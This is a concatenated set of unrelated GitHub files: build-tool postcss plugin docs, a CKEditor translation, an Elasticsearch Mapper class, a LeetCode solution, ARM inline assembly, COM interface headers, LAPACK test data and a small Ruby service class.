                            match: 'xx', // supports a regexp or a string
                            replace: 'xx'
                        }
                    ]
                }
            ]
        }
    ]
}
```
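As referenced in the `json5` item above, a minimal sketch of routing `.json5` files through the `json5` processor (assuming the `json5` dependency is installed; the rule shape mirrors the examples above):
```javascript
{
    rules: [
        {
            // convert json5 config files to plain json
            match: '*.json5',
            processors: [
                { name: 'json5' }
            ]
        }
    ]
}
```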
## Postcss Plugins
* `env`: `supported since version 0.4`; the core plugin for writing platform-specific style code, see [here](advance/platformSpecCode#样式). To use it, register the plugin as follows
```javascript
{
    processors: {
        postcss: {
            options: {
                plugins: ['env']
            }
        }
    }
}
```
* `quickcss`: `supported since version 0.4.11`; enabling this plugin automatically fixes some style declarations that Quick App does not support (a sketch of enabling it follows at the end of this section); for Quick App style support see [here](https://doc.quickapp.cn/widgets/common-styles.html)
    * Background shorthand: `background` declarations are expanded automatically, since Quick App does not support the combined form ([details here](https://doc.quickapp.cn/widgets/background-img-styles.html)); e.g. `background: url(./img.png) no-repeat` becomes `background-image: url(./img.png); background-repeat: no-repeat;`
    * Quick App does not support shorthand color values: e.g. `background-color: #2dd` becomes `background-color: #22dddd`; currently the color parts of `background` and `border` related styles are handled;
    * `border` styles: Quick App does not support `none`, which is automatically converted to `0`; it also does not support the combined `border-left/border-right/border-top/border-bottom` forms, which are expanded automatically, e.g. `border-left: 1px solid #ccc` becomes `border-left-width: 1px; border-left-style: solid; border-left-color: #cccccc;`
    * `font-weight`: Quick App does not support numeric values; they are converted to `normal`/`bold`: values `< 600` become `normal`, values `>= 600` become `bold`
    * `display`: Quick App only supports `flex`; `block` is automatically converted to `flex`
    * `position`: Quick App only supports `fixed`; `absolute` is automatically converted to `fixed`
* `autoprefixer`
    * Requires installing the dependency: `npm i autoprefixer --save-dev`
* `px2rpx`: automatically converts `px` units to `rpx`
```javascript
{
    rules: [
        {
            match: '*.css',
            processors: {
                postcss: {
                    plugins: {
                        autoprefixer: {
                            browsers: [
                                'last 3 versions',
                                'iOS >= 8',
                                'Android >= 4.1'
                            ]
                        },
                        px2rpx: {
                            // design draft width
                            designWidth: 1242,
                            // keep 1px values untouched, i.e. numbers equal to 1px are not converted
                            // (supported since okam-build 0.4.6)
                            noTrans1px: true,
                            // number of decimal places to keep, defaults to 2
                            precision: 2
                        }
                    }
                }
            }
        }
    ]
}
```
If you use a pre-processed style language such as `stylus`, you can combine it with `postcss` through a configuration like the following:
```javascript
{
    processors: {
        postcss: {
            // specify the extensions to process; by default the `stylus` processor
            // has a higher execution priority than `postcss`
            extnames: ['styl', 'css'],
            options: {
                // ...
            }
        }
    },
    rules: [
        // ...
    ]
}
```
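As mentioned in the `quickcss` item above, a minimal sketch of enabling that plugin (registration mirrors the `env` example above; this document does not show any options for `quickcss`, so none are passed here):
```javascript
{
    processors: {
        postcss: {
            options: {
                // automatically rewrites style declarations Quick App does not support
                plugins: ['quickcss']
            }
        }
    }
}
```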
| {
"pile_set_name": "Github"
} |
# Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.
#
# !!! IMPORTANT !!!
#
# Before you edit this file, please keep in mind that contributing to the project
# translations is possible ONLY via the Transifex online service.
#
# To submit your translations, visit https://www.transifex.com/ckeditor/ckeditor5.
#
# To learn more, check out the official contributor's guide:
# https://ckeditor.com/docs/ckeditor5/latest/framework/guides/contributing/contributing.html
#
msgid ""
msgstr ""
"Language-Team: Latvian (https://www.transifex.com/ckeditor/teams/11143/lv/)\n"
"Language: lv\n"
"Plural-Forms: nplurals=3; plural=(n%10==1 && n%100!=11 ? 0 : n != 0 ? 1 : 2);\n"
msgctxt "Toolbar button tooltip for the Undo feature."
msgid "Undo"
msgstr "Atsaukt"
msgctxt "Toolbar button tooltip for the Redo feature."
msgid "Redo"
msgstr "Uz priekšu"
| {
"pile_set_name": "Github"
} |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.index.mapper;
import org.apache.cassandra.cql3.CQL3Type;
import org.apache.cassandra.cql3.ColumnIdentifier;
import org.apache.cassandra.utils.ByteBufferUtil;
import org.elasticsearch.Version;
import org.elasticsearch.common.settings.Settings;
import org.elasticsearch.common.xcontent.ToXContentFragment;
import org.elasticsearch.index.analysis.IndexAnalyzers;
import org.elasticsearch.index.query.QueryShardContext;
import org.elasticsearch.index.similarity.SimilarityProvider;
import java.nio.ByteBuffer;
import java.util.Map;
import java.util.Objects;
import java.util.function.Function;
import java.util.function.Supplier;
public abstract class Mapper implements ToXContentFragment, Iterable<Mapper> {
public static class BuilderContext {
private final Settings indexSettings;
private final ContentPath contentPath;
public BuilderContext(Settings indexSettings, ContentPath contentPath) {
Objects.requireNonNull(indexSettings, "indexSettings is required");
this.contentPath = contentPath;
this.indexSettings = indexSettings;
}
public ContentPath path() {
return this.contentPath;
}
public Settings indexSettings() {
return this.indexSettings;
}
public Version indexCreatedVersion() {
return Version.indexCreated(indexSettings);
}
}
public abstract static class Builder<T extends Builder, Y extends Mapper> {
public String name;
protected T builder;
protected Builder(String name) {
this.name = name;
}
public String name() {
return this.name;
}
/** Returns a newly built mapper. */
public abstract Y build(BuilderContext context);
}
public interface TypeParser {
class ParserContext {
private final String type;
private final IndexAnalyzers indexAnalyzers;
private final Function<String, SimilarityProvider> similarityLookupService;
private final MapperService mapperService;
private final Function<String, TypeParser> typeParsers;
private final Version indexVersionCreated;
private final Supplier<QueryShardContext> queryShardContextSupplier;
public ParserContext(String type, IndexAnalyzers indexAnalyzers, Function<String, SimilarityProvider> similarityLookupService,
MapperService mapperService, Function<String, TypeParser> typeParsers,
Version indexVersionCreated, Supplier<QueryShardContext> queryShardContextSupplier) {
this.type = type;
this.indexAnalyzers = indexAnalyzers;
this.similarityLookupService = similarityLookupService;
this.mapperService = mapperService;
this.typeParsers = typeParsers;
this.indexVersionCreated = indexVersionCreated;
this.queryShardContextSupplier = queryShardContextSupplier;
}
public String type() {
return type;
}
public IndexAnalyzers getIndexAnalyzers() {
return indexAnalyzers;
}
public SimilarityProvider getSimilarity(String name) {
return similarityLookupService.apply(name);
}
public MapperService mapperService() {
return mapperService;
}
public TypeParser typeParser(String type) {
return typeParsers.apply(type);
}
public Version indexVersionCreated() {
return indexVersionCreated;
}
public Supplier<QueryShardContext> queryShardContextSupplier() {
return queryShardContextSupplier;
}
public boolean isWithinMultiField() { return false; }
protected Function<String, TypeParser> typeParsers() { return typeParsers; }
protected Function<String, SimilarityProvider> similarityLookupService() { return similarityLookupService; }
public ParserContext createMultiFieldContext(ParserContext in) {
return new MultiFieldParserContext(in) {
@Override
public boolean isWithinMultiField() { return true; }
};
}
static class MultiFieldParserContext extends ParserContext {
MultiFieldParserContext(ParserContext in) {
super(in.type(), in.indexAnalyzers, in.similarityLookupService(), in.mapperService(), in.typeParsers(),
in.indexVersionCreated(), in.queryShardContextSupplier());
}
}
}
Mapper.Builder<?,?> parse(String name, Map<String, Object> node, ParserContext parserContext) throws MapperParsingException;
}
private final String simpleName;
private ByteBuffer cqlName;
public Mapper(String simpleName) {
Objects.requireNonNull(simpleName);
this.simpleName = simpleName;
}
/** Returns the simple name, which identifies this mapper against other mappers at the same level in the mappers hierarchy
* TODO: make this protected once Mapper and FieldMapper are merged together */
public final String simpleName() {
return simpleName;
}
/** Returns the canonical name which uniquely identifies the mapper against other mappers in a type. */
public abstract String name();
/**
     * Returns a name representing the type of this mapper.
*/
public abstract String typeName();
/** Return the merge of {@code mergeWith} into this.
* Both {@code this} and {@code mergeWith} will be left unmodified. */
public abstract Mapper merge(Mapper mergeWith, boolean updateAllTypes);
/**
* Update the field type of this mapper. This is necessary because some mapping updates
* can modify mappings across several types. This method must return a copy of the mapper
* so that the current mapper is not modified.
*/
public abstract Mapper updateFieldType(Map<String, MappedFieldType> fullNameToFieldType);
public abstract boolean hasField();
/**
* @return cql column name as a ByteBuffer
*/
public ByteBuffer cqlName() {
if (cqlName == null) {
cqlName = ByteBufferUtil.bytes(this.simpleName);
}
return cqlName;
}
}
| {
"pile_set_name": "Github"
} |
# [970. Powerful Integers (Easy)](https://leetcode.com/problems/powerful-integers/)
<p>Given two non-negative integers <code>x</code> and <code>y</code>, an integer is <em>powerful</em> if it is equal to <code>x^i + y^j</code> for some integers <code>i >= 0</code> and <code>j >= 0</code>.</p>
<p>Return a list of all <em>powerful</em> integers that have value less than or equal to <code>bound</code>.</p>
<p>You may return the answer in any order. In your answer, each value should occur at most once.</p>
<p> </p>
<div>
<p><strong>Example 1:</strong></p>
<pre><strong>Input: </strong>x = <span id="example-input-1-1">2</span>, y = <span id="example-input-1-2">3</span>, bound = <span id="example-input-1-3">10</span>
<strong>Output: </strong><span id="example-output-1">[2,3,4,5,7,9,10]</span>
<strong>Explanation: </strong>
2 = 2^0 + 3^0
3 = 2^1 + 3^0
4 = 2^0 + 3^1
5 = 2^1 + 3^1
7 = 2^2 + 3^1
9 = 2^3 + 3^0
10 = 2^0 + 3^2
</pre>
<div>
<p><strong>Example 2:</strong></p>
<pre><strong>Input: </strong>x = <span id="example-input-2-1">3</span>, y = <span id="example-input-2-2">5</span>, bound = <span id="example-input-2-3">15</span>
<strong>Output: </strong><span id="example-output-2">[2,4,6,8,10,14]</span>
</pre>
</div>
</div>
<p> </p>
<p><strong>Note:</strong></p>
<ul>
<li><code>1 <= x <= 100</code></li>
<li><code>1 <= y <= 100</code></li>
<li><code>0 <= bound <= 10^6</code></li>
</ul>
**Related Topics**:
[Math](https://leetcode.com/tag/math/)
## Solution 1.
```cpp
// OJ: https://leetcode.com/problems/powerful-integers/
// Author: github.com/lzl124631x
// Time: O(log_x^bound * log_y^bound)
// Space: O(log_x^bound * log_y^bound)
class Solution {
public:
vector<int> powerfulIntegers(int x, int y, int bound) {
unordered_set<int> s;
for (int a = 1; a + 1 <= bound; a = x == 1 ? bound : a * x)
for (int b = 1; a + b <= bound; b = y == 1 ? bound : b * y)
s.insert(a + b);
return vector<int>(s.begin(), s.end());
}
};
``` | {
"pile_set_name": "Github"
} |
/***********************************************************************
Copyright (c) 2006-2011, Skype Limited. All rights reserved.
Copyright (c) 2013 Parrot
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Internet Society, IETF or IETF Trust, nor the
names of specific contributors, may be used to endorse or promote
products derived from this software without specific prior written
permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#ifndef SILK_SIGPROC_FIX_ARMv5E_H
#define SILK_SIGPROC_FIX_ARMv5E_H
#undef silk_SMULTT
static OPUS_INLINE opus_int32 silk_SMULTT_armv5e(opus_int32 a, opus_int32 b)
{
opus_int32 res;
__asm__(
"#silk_SMULTT\n\t"
"smultt %0, %1, %2\n\t"
: "=r"(res)
: "%r"(a), "r"(b)
);
return res;
}
#define silk_SMULTT(a, b) (silk_SMULTT_armv5e(a, b))
#undef silk_SMLATT
static OPUS_INLINE opus_int32 silk_SMLATT_armv5e(opus_int32 a, opus_int32 b,
opus_int32 c)
{
opus_int32 res;
__asm__(
"#silk_SMLATT\n\t"
"smlatt %0, %1, %2, %3\n\t"
: "=r"(res)
: "%r"(b), "r"(c), "r"(a)
);
return res;
}
#define silk_SMLATT(a, b, c) (silk_SMLATT_armv5e(a, b, c))
#endif
| {
"pile_set_name": "Github"
} |
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Resource.rc
//
#define IDI_ICON1 101
#define IDI_MAIN_ICON 101
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 102
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
| {
"pile_set_name": "Github"
} |
/* this ALWAYS GENERATED file contains the definitions for the interfaces */
/* File created by MIDL compiler version 6.00.0361 */
/* at Wed Dec 19 17:45:04 2007
*/
/* Compiler settings for .\_GifSmiley.idl:
Oicf, W1, Zp8, env=Win32 (32b run)
protocol : dce , ms_ext, c_ext, robust
error checks: allocation ref bounds_check enum stub_data
VC __declspec() decoration level:
__declspec(uuid()), __declspec(selectany), __declspec(novtable)
DECLSPEC_UUID(), MIDL_INTERFACE()
*/
//@@MIDL_FILE_HEADING( )
#pragma warning( disable: 4049 ) /* more than 64k source lines */
#pragma once
/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 475
#endif
#include "rpc.h"
#include "rpcndr.h"
#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif // __RPCNDR_H_VERSION__
#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/
#ifndef __GifSmiley_h__
#define __GifSmiley_h__
#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif
/* Forward Declarations */
#ifndef __IGifSmileyCtrl_FWD_DEFINED__
#define __IGifSmileyCtrl_FWD_DEFINED__
typedef interface IGifSmileyCtrl IGifSmileyCtrl;
#endif /* __IGifSmileyCtrl_FWD_DEFINED__ */
#ifndef __CGifSmileyCtrl_FWD_DEFINED__
#define __CGifSmileyCtrl_FWD_DEFINED__
#ifdef __cplusplus
typedef class CGifSmileyCtrl CGifSmileyCtrl;
#else
typedef struct CGifSmileyCtrl CGifSmileyCtrl;
#endif /* __cplusplus */
#endif /* __CGifSmileyCtrl_FWD_DEFINED__ */
/* header files for imported files */
#include "prsht.h"
#include "mshtml.h"
#include "mshtmhst.h"
#include "exdisp.h"
#include "objsafe.h"
#ifdef __cplusplus
extern "C"{
#endif
void * __RPC_USER MIDL_user_allocate(size_t);
void __RPC_USER MIDL_user_free( void * );
#ifndef __IGifSmileyCtrl_INTERFACE_DEFINED__
#define __IGifSmileyCtrl_INTERFACE_DEFINED__
/* interface IGifSmileyCtrl */
/* [unique][helpstring][dual][uuid][object] */
namespace GifSmiley {
//const IID IID_IGifSmileyCtrl;
#define DEFINE_GUIDXXX(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
EXTERN_C const GUID CDECL name \
= { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } }
DEFINE_GUIDXXX(IID_IGifSmileyCtrl, 0xCB64102B, 0x8CE4, 0x4A55, 0xB0, 0x50,
0x13, 0x1C, 0x43, 0x5A, 0x3A, 0x3F);
#if defined(__cplusplus) && !defined(CINTERFACE)
MIDL_INTERFACE("CB64102B-8CE4-4A55-B050-131C435A3A3F")
IGifSmileyCtrl : public IDispatch
{
public:
virtual /* [id][requestedit][bindable][propput] */ HRESULT STDMETHODCALLTYPE put_BackColor(
/* [in] */ OLE_COLOR clr) = 0;
virtual /* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE get_BackColor(
/* [retval][out] */ OLE_COLOR *pclr) = 0;
virtual /* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE get_HWND(
/* [retval][out] */ long *pHWND) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadFromFile(
/* [in] */ BSTR bstrFileName) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE LoadFromFileSized(
/* [in] */ BSTR bstrFileName,
/* [in] */ INT nWidth,
/* [in] */ INT nHeight) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE SetHostWindow(
/* [in] */ long hwndHostWindow,
/* [in] */ INT nNotyfyMode) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE FileName(
/* [retval][out] */ BSTR* pVal) = 0;
virtual /* [id] */ HRESULT STDMETHODCALLTYPE FreeImage(
) = 0;
};
#else /* C style interface */
typedef struct IGifSmileyCtrlVtbl
{
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
IGifSmileyCtrl * This,
/* [in] */ REFIID riid,
/* [iid_is][out] */ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
IGifSmileyCtrl * This);
ULONG(STDMETHODCALLTYPE *Release)(
IGifSmileyCtrl * This);
HRESULT(STDMETHODCALLTYPE *GetTypeInfoCount)(
IGifSmileyCtrl * This,
/* [out] */ UINT *pctinfo);
HRESULT(STDMETHODCALLTYPE *GetTypeInfo)(
IGifSmileyCtrl * This,
/* [in] */ UINT iTInfo,
/* [in] */ LCID lcid,
/* [out] */ ITypeInfo **ppTInfo);
HRESULT(STDMETHODCALLTYPE *GetIDsOfNames)(
IGifSmileyCtrl * This,
/* [in] */ REFIID riid,
/* [size_is][in] */ LPOLESTR *rgszNames,
/* [in] */ UINT cNames,
/* [in] */ LCID lcid,
/* [size_is][out] */ DISPID *rgDispId);
/* [local] */ HRESULT(STDMETHODCALLTYPE *Invoke)(
IGifSmileyCtrl * This,
/* [in] */ DISPID dispIdMember,
/* [in] */ REFIID riid,
/* [in] */ LCID lcid,
/* [in] */ WORD wFlags,
/* [out][in] */ DISPPARAMS *pDispParams,
/* [out] */ VARIANT *pVarResult,
/* [out] */ EXCEPINFO *pExcepInfo,
/* [out] */ UINT *puArgErr);
/* [id][requestedit][bindable][propput] */ HRESULT(STDMETHODCALLTYPE *put_BackColor)(
IGifSmileyCtrl * This,
/* [in] */ OLE_COLOR clr);
/* [id][requestedit][bindable][propget] */ HRESULT(STDMETHODCALLTYPE *get_BackColor)(
IGifSmileyCtrl * This,
/* [retval][out] */ OLE_COLOR *pclr);
/* [id][requestedit][bindable][propget] */ HRESULT(STDMETHODCALLTYPE *get_HWND)(
IGifSmileyCtrl * This,
/* [retval][out] */ long *pHWND);
/* [id] */ HRESULT(STDMETHODCALLTYPE *LoadFromFile)(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName);
/* [id] */ HRESULT(STDMETHODCALLTYPE *LoadFromFileSized)(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName,
/* [in] */ INT nWidth,
/* [in] */ INT nHeight);
/* [id] */ HRESULT(STDMETHODCALLTYPE *SetHostWindow)(
IGifSmileyCtrl * This,
/* [in] */ long hwndHostWindow,
/* [in] */ INT nNotyfyMode);
END_INTERFACE
} IGifSmileyCtrlVtbl;
interface IGifSmileyCtrl
{
CONST_VTBL struct IGifSmileyCtrlVtbl *lpVtbl;
};
#ifdef COBJMACROS
#define IGifSmileyCtrl_QueryInterface(This,riid,ppvObject) \
(This)->lpVtbl->QueryInterface(This, riid, ppvObject)
#define IGifSmileyCtrl_AddRef(This) \
(This)->lpVtbl->AddRef(This)
#define IGifSmileyCtrl_Release(This) \
(This)->lpVtbl->Release(This)
#define IGifSmileyCtrl_GetTypeInfoCount(This,pctinfo) \
(This)->lpVtbl->GetTypeInfoCount(This, pctinfo)
#define IGifSmileyCtrl_GetTypeInfo(This,iTInfo,lcid,ppTInfo) \
(This)->lpVtbl->GetTypeInfo(This, iTInfo, lcid, ppTInfo)
#define IGifSmileyCtrl_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) \
(This)->lpVtbl->GetIDsOfNames(This, riid, rgszNames, cNames, lcid, rgDispId)
#define IGifSmileyCtrl_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) \
(This)->lpVtbl->Invoke(This, dispIdMember, riid, lcid, wFlags, pDispParams, pVarResult, pExcepInfo, puArgErr)
#define IGifSmileyCtrl_put_BackColor(This,clr) \
(This)->lpVtbl->put_BackColor(This, clr)
#define IGifSmileyCtrl_get_BackColor(This,pclr) \
(This)->lpVtbl->get_BackColor(This, pclr)
#define IGifSmileyCtrl_get_HWND(This,pHWND) \
(This)->lpVtbl->get_HWND(This, pHWND)
#define IGifSmileyCtrl_LoadFromFile(This,bstrFileName) \
(This)->lpVtbl->LoadFromFile(This, bstrFileName)
#define IGifSmileyCtrl_LoadFromFileSized(This,bstrFileName,nWidth,nHeight) \
(This)->lpVtbl->LoadFromFileSized(This, bstrFileName, nWidth, nHeight)
#define IGifSmileyCtrl_SetHostWindow(This,hwndHostWindow,nNotyfyMode) \
(This)->lpVtbl->SetHostWindow(This, hwndHostWindow, nNotyfyMode)
#endif /* COBJMACROS */
#endif /* C style interface */
/* [id][requestedit][bindable][propput] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_put_BackColor_Proxy(
IGifSmileyCtrl * This,
/* [in] */ OLE_COLOR clr);
void __RPC_STUB IGifSmileyCtrl_put_BackColor_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_get_BackColor_Proxy(
IGifSmileyCtrl * This,
/* [retval][out] */ OLE_COLOR *pclr);
void __RPC_STUB IGifSmileyCtrl_get_BackColor_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id][requestedit][bindable][propget] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_get_HWND_Proxy(
IGifSmileyCtrl * This,
/* [retval][out] */ long *pHWND);
void __RPC_STUB IGifSmileyCtrl_get_HWND_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_LoadFromFile_Proxy(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName);
void __RPC_STUB IGifSmileyCtrl_LoadFromFile_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_LoadFromFileSized_Proxy(
IGifSmileyCtrl * This,
/* [in] */ BSTR bstrFileName,
/* [in] */ INT nWidth,
/* [in] */ INT nHeight);
void __RPC_STUB IGifSmileyCtrl_LoadFromFileSized_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
/* [id] */ HRESULT STDMETHODCALLTYPE IGifSmileyCtrl_SetHostWindow_Proxy(
IGifSmileyCtrl * This,
/* [in] */ long hwndHostWindow,
/* [in] */ INT nNotyfyMode);
void __RPC_STUB IGifSmileyCtrl_SetHostWindow_Stub(
IRpcStubBuffer *This,
IRpcChannelBuffer *_pRpcChannelBuffer,
PRPC_MESSAGE _pRpcMessage,
DWORD *_pdwStubPhase);
#endif /* __IGifSmileyCtrl_INTERFACE_DEFINED__ */
#ifndef __GifSmiley_LIBRARY_DEFINED__
#define __GifSmiley_LIBRARY_DEFINED__
/* library GifSmiley */
/* [helpstring][custom][uuid][version] */
EXTERN_C const IID LIBID_GifSmiley;
CLSID CLSID_CGifSmileyCtrl = { 0xDB35DD77, 0x55E2, 0x4905, { 0x80, 0x75, 0xEB, 0x35, 0x1B, 0xB5, 0xCB, 0xC1 } };
// const CLSID CLSID_CGifSmileyCtrl;
// struct __declspec(uuid("DB35DD77-55E2-4905-8075-EB351BB5CBC1")) CLSID_CGifSmileyCtrl;
#ifdef __cplusplus
class DECLSPEC_UUID("DB35DD77-55E2-4905-8075-EB351BB5CBC1")
CGifSmileyCtrl;
#endif
#endif /* __GifSmiley_LIBRARY_DEFINED__ */
/* Additional Prototypes for ALL interfaces */
unsigned long __RPC_USER BSTR_UserSize(unsigned long *, unsigned long, BSTR *);
unsigned char * __RPC_USER BSTR_UserMarshal(unsigned long *, unsigned char *, BSTR *);
unsigned char * __RPC_USER BSTR_UserUnmarshal(unsigned long *, unsigned char *, BSTR *);
void __RPC_USER BSTR_UserFree(unsigned long *, BSTR *);
/* end of Additional Prototypes */
}
#ifdef __cplusplus
}
#endif
#endif
| {
"pile_set_name": "Github"
} |
Data file for testing DOUBLE PRECISION LAPACK linear equation routines RFP format
9 Number of values of N (at most 9)
0 1 2 3 5 6 10 11 50 Values of N
3 Number of values of NRHS (at most 9)
1 2 15 Values of NRHS (number of right hand sides)
9 Number of matrix types (list types on next line if 0 < NTYPES < 9)
1 2 3 4 5 6 7 8 9 Matrix Types
30.0 Threshold value of test ratio
T Put T to test the error exits
| {
"pile_set_name": "Github"
} |
# frozen_string_literal: true
class BaseService
attr_accessor :current_user, :params
def initialize(user, params = {})
@current_user = user
@params = params.dup
end
end
| {
"pile_set_name": "Github"
} |